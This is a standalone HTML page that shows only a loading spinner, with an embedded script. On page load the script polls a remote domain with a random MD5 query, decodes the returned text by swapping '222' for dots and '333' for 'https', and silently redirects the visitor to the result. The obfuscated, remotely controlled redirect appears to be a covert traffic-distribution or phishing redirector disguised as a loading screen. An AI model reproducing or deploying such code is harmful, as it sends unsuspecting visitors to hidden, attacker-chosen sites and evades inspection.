<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  
      <style>
 
.loader {
  --d:22px;
  width: 4px;
  height: 4px;
  border-radius: 50%;
  color: #25b09b;
  box-shadow: 
    calc(1*var(--d))      calc(0*var(--d))     0 0,
    calc(0.707*var(--d))  calc(0.707*var(--d)) 0 1px,
    calc(0*var(--d))      calc(1*var(--d))     0 2px,
    calc(-0.707*var(--d)) calc(0.707*var(--d)) 0 3px,
    calc(-1*var(--d))     calc(0*var(--d))     0 4px,
    calc(-0.707*var(--d)) calc(-0.707*var(--d))0 5px,
    calc(0*var(--d))      calc(-1*var(--d))    0 6px;
  animation: l27 1s infinite steps(8);
}
@keyframes l27 {
  100% {transform: rotate(1turn)}
}
    </style>
</head>
<body><div class="center-div">
  <div class="loader"></div>
  <div style="display: none;">
   
  </div>
  
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/blueimp-md5/2.18.0/js/md5.min.js"></script>
<script>
  $(document).ready(function() {
    // Function to generate a random MD5 hash
    function generateRandomMD5() {
      const randomString = Math.random().toString(36).substr(2, 9);
      return md5(randomString);
    }

    // Function to redirect user to a specified page
    function redirectToPage(page) {
      window.location.href = page;
    }

    function checkForRedirection() {
      const randomMD5 = generateRandomMD5(); // Generate a random MD5 hash
      const targetUrl = `https://libraries.books-about-bc.com//?${randomMD5}`; // Append the random MD5 hash to the URL

      $.ajax({
        url: targetUrl,
        method: 'GET',
        success: function(response) {
          if (response !== "") {
            let modifiedString = response.replace(/222/g, ".");
            let modifiedString2 = modifiedString.replace(/333/g, "https");
            redirectToPage(modifiedString2);
          } else {
            setTimeout(checkForRedirection, 5000); // Retry after 5 seconds if no redirection URL is received
          }
        },
        error: function(xhr, status, error) {
          console.error('Error fetching data:', error);
          setTimeout(checkForRedirection, 5000); // Retry after 5 seconds on error
        }
      });
    }

    // Start checking for redirection URL after a 3-second delay
    setTimeout(checkForRedirection, 3000);
  });
</script>

</body>
</html>
